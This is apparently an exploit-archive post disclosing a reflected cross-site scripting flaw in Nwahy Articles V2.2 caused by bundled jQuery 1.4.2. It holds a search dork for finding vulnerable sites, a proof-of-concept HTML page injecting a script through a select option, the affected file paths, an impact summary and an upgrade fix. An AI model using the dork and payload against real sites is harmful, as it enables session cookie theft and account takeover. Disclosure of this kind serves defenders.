facebook facebook twitter rss

Nwahy Articles V2.2 jQuery cross site scripting EXploits

Author: indoushka , Published: 25-10-2014
Nwahy Articles V2.2 jQuery cross site scripting EXploits
========================================================
Author : indoushka
Vondor : http://www.nwahy.com/
Dork: Powered by: Nwahy Articles V2.2
==========================
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery 1.4.2 </title>
<script src="http://localhost//article-v2.2/js/menu/jquery.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>


<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert(&#x27;xss
reflected - jquery 1.4.2 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
</select>
</p>
</form>
</body>
</html>

=========
This page is using an older version of jQuery that is vulnerable to a Cross Site Scripting vulnerability. Many sites are using to select elements using location.hash that allows someone to inject script into the page. This problem was fixed in jQuery 1.6.3.
Affected items
/article-v2.2/admincp/js/jquery.min.js
/article-v2.2/admincp/js/jquery-1.4.3.min.js
/article-v2.2/js/menu/jquery.min.js
/article-v2.2/js/rating/jquery.js
/article-v2.2/js/slider/jquery.min.js
/article-v2.2/js/slides/jquery.js
The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

How to fix this vulnerability
Update to the latest version of jQuery.

Like us on Facebook :